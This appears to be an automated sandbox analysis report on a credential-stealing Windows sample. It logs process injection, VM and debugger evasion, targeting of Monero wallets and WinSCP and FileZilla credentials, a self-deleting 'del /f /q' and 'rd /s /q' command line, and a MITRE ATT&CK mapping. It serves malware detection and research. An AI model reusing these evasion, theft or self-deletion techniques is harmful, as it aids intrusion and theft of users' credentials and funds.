Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: amsi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: userenv.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: version.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: sxs.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: propsys.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: edputil.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: slc.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: sppc.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: mpr.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe; Section loaded: version.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Binary string: my_library.pdbU source: njrtdhadawt.exe, chrome.dll.0.dr
Source: Binary string: my_library.pdb source: njrtdhadawt.exe, chrome.dll.0.dr
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF80C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00FF80C5
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FFD855 push ecx; ret 0_2_00FFD868
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_0100EBE2 push ecx; ret 0_2_0100EBF5
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_010027D9 push esi; ret 0_2_010027DB
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_6CD6DE51 push ecx; ret 0_2_6CD6DE64
Source: C:\Users\user\Desktop\njrtdhadawt.exe; File created: C:\ProgramData\chrome.dll

                            Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\njrtdhadawt.exe; Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF80C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00FF80C5
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

Source: Yara match; File source: njrtdhadawt.exe, type: SAMPLE
Source: Yara match; File source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
Source: njrtdhadawt.exe; Binary or memory string: DIR_WATCH.DLL
Source: njrtdhadawt.exe; Binary or memory string: SBIEDLL.DLL
Source: njrtdhadawt.exe; Binary or memory string: API_LOG.DLL
Source: njrtdhadawt.exe; Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:38:1216:38:1216:38:1216:38:1216:38:1216:38:12DELAYS.TMP%S%SNTDLL.DLL
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 0_2_00FE17FD
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Dropped PE file which has not been started: C:\ProgramData\chrome.dll
Source: C:\Windows\SysWOW64\timeout.exe TID: 7728; Thread sleep count: 82 > 30
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF0FFE GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00FF1111h 0_2_00FF0FFE
Source: C:\Users\user\Desktop\njrtdhadawt.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FEC087 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00FEC087
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF61AE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FF61AE
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FEBA79 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FEBA79
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF5CE8 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00FF5CE8
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FE9DAF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FE9DAF
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FE1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FE1D70
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FECEEB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00FECEEB
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF4EA5 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 0_2_00FF4EA5
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF561A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_00FF561A
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FED77A FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FED77A
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FEB719 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00FEB719
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_6CD6717D FindFirstFileExW, 0_2_6CD6717D
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF531F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 0_2_00FF531F
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF11DD GetSystemInfo,wsprintfA, 0_2_00FF11DD
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003A27000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:ocal
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMwareVMware
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Users\user\Desktop\njrtdhadawt.exe; API call chain: ExitProcess graph end node graph_0-57233
Source: C:\Users\user\Desktop\njrtdhadawt.exe; API call chain: ExitProcess graph end node graph_0-57218
Source: C:\Users\user\Desktop\njrtdhadawt.exe; API call chain: ExitProcess graph end node graph_0-58343
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FFCAB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00FFCAB4
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF80C5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00FF80C5
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FE149D mov eax, dword ptr fs:[00000030h] 0_2_00FE149D
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF801C mov eax, dword ptr fs:[00000030h] 0_2_00FF801C
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF801B mov eax, dword ptr fs:[00000030h] 0_2_00FF801B
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FE1492 mov eax, dword ptr fs:[00000030h] 0_2_00FE1492
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FE147A mov eax, dword ptr fs:[00000030h] 0_2_00FE147A
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FEE883 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA, 0_2_00FEE883
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_010070CE SetUnhandledExceptionFilter, 0_2_010070CE
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FFCAB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00FFCAB4
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FFD42C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00FFD42C
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_6CD66ACC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CD66ACC
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_6CD61726 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CD61726
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_6CD611FD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CD611FD

                            HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FEF840 _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 0_2_00FEF840
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF287A __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00FF287A
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF29DE CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_00FF29DE
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF2951 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00FF2951
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FE118E cpuid 0_2_00FE118E
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00FF0FFE
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: GetLocaleInfoA, 0_2_0100E144
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_0100980E
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 0_2_0100E00F
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_01007016
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0100B020
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_01008864
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0100B087
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 0_2_0100B0C3
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0100AB6C
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 0_2_0100AD08
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_0100AD63
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 0_2_0100A5E0
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_0100AC61
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_010094F0
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_0100AF34
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 0_2_01006F3C
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: EnumSystemLocalesA, 0_2_0100AFF6
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 0_2_01004E83
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FFBA48 lstrcpyA,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime, 0_2_00FFBA48
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF0E76 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00FF0E76
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF0F51 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_00FF0F51
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\njrtdhadawt.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                            Stealing of Sensitive Information

Source: Yara match File source: njrtdhadawt.exe, type: SAMPLE
Source: Yara match File source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: njrtdhadawt.exe, type: SAMPLE
Source: Yara match File source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
Source: C:\Users\user\Desktop\njrtdhadawt.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\Desktop\njrtdhadawt.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

                            Remote Access Functionality

Source: Yara match File source: njrtdhadawt.exe, type: SAMPLE
Source: Yara match File source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: njrtdhadawt.exe, type: SAMPLE
Source: Yara match File source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the count of matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Native API (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Create Account (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Process Injection (211); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1); File Deletion (1); Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (211); Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping (1); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (55); Security Software Discovery (251); Virtualization/Sandbox Evasion (1); Process Discovery (12); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
